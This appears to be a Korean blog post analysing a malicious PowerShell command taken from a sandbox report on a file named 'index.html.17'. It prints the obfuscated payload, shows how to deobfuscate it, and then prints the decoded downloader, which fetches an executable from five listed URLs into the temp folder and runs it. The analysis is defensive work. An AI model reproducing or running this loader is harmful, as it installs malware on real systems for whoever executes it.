728x90
Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'index.html.17'
Hybrid Analysis requires that users undergo the Hybrid Analysis Vetting Process prior to obtaining an API key or downloading malware samples. Please note that you must abide by the Hybrid Analysis Terms and Conditions and only use these samples for researc
www.hybrid-analysis.com
프로세스를 보면 다음과 같이 powershell이 보인다.
이를 복호화 하면 다음과 같이 나온다.
& ( $ENv:pubLiC[13]+$eNV:PUbLIC[5]+'x')( -JoiN ( '36d119&115;99&114K105&112K116d32;61d32&110}101K119!45K111z98!106n101;99G116&32d45&67G111z109Q79G98!106}101;99!116n32G87!83&99n114Q105K112&116;46;83G104K101Q108z108n59z36Q119d101&98G99&108z105!101;110K116;32n61}32}110d101d119}45d111K98!106z101z99d116G32&83K121K115;116!101n109Q46&78G101;116!46n87&101;98z67Q108}105d101&110&116;59;36&114K97G110n100n111n109&32z61n32}110d101K119!45z111;98!106;101G99Q116d32G114;97&110z100Q111z109G59Q36K117Q114d108}115K32n61;32K39n104}116;116;112z58!47K47;112!105;110}103d115K116K97d116}101d46G99!111}109&47d66z47Q44G104G116G116Q112Q58Q47z47K99!108Q97z110G99n111}109&115Q46}99n111z109Q47G118Q76Q103K75d116G119n109n65d76Q47;44K104&116}116n112}58z47d47d107G101K118G105K110}103n114K101z97G118;101K115G46n99z111d109z47z100&82!47;44}104d116Q116Q112&58z47;47z116z104z105d110;107G45d102&97d99}116z111d114!121}46K99&104!47;111!73;82}106z117}110n119&81&110!47Q44;104!116Q116Q112&58n47&47&109z111z98z105G108&105!122}114d46!99&111z109n47&117;71z102d68Q77}69n47&39}46;83Q112K108n105z116d40!39G44G39;41z59n36!110K97z109Q101G32!61z32!36n114n97&110z100&111}109}46z110n101K120!116d40n49Q44z32&54z53Q53d51;54;41&59}36Q112!97n116&104;32z61!32!36G101n110Q118Q58}116K101;109z112G32z43K32n39Q92!39Q32!43G32z36Q110G97K109n101d32}43n32}39K46&101G120G101d39d59n102d111Q114!101!97d99K104&40n36!117!114z108G32&105d110!32G36d117n114z108n115z41!123&116}114z121;123K36n119z101!98d99;108;105n101n110d116d46d68&111K119Q110Q108!111n97&100d70n105!108z101n40d36!117K114Q108K46!84z111z83n116G114&105&110n103G40K41Q44n32!36G112z97;116z104}41G59z83;116;97n114;116&45G80&114z111!99}101z115G115Q32;36Q112d97Q116}104!59z98Q114&101G97K107K59;125Q99Q97&116d99&104d123z119&114z105;116K101G45!104K111;115;116G32!36K95&46;69K120&99K101&112n116G105;111}110!46!77K101G115K115&97;103!101G59&125!125'.sPlIT( '&!Kzd}nQ;G' )|% {([ChAR][int] $_)} ))
powershell ise에서 앞에 & ( $ENv:pubLiC[13]+$eNV:PUbLIC[5]+'x') 를 지워주고 실행을 하면 다음과 같이 난독화가 풀린다.
$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://pingstate.com/B/,http://clancoms.com/vLgKtwmAL/,http://keving reaves.com/dR/,http://think-factory.ch/oIRjunwQn/,http://mobilizr.com/uGfDME/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclie nt.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
이쁘게 바꿔주면 다음과 같다.
728x90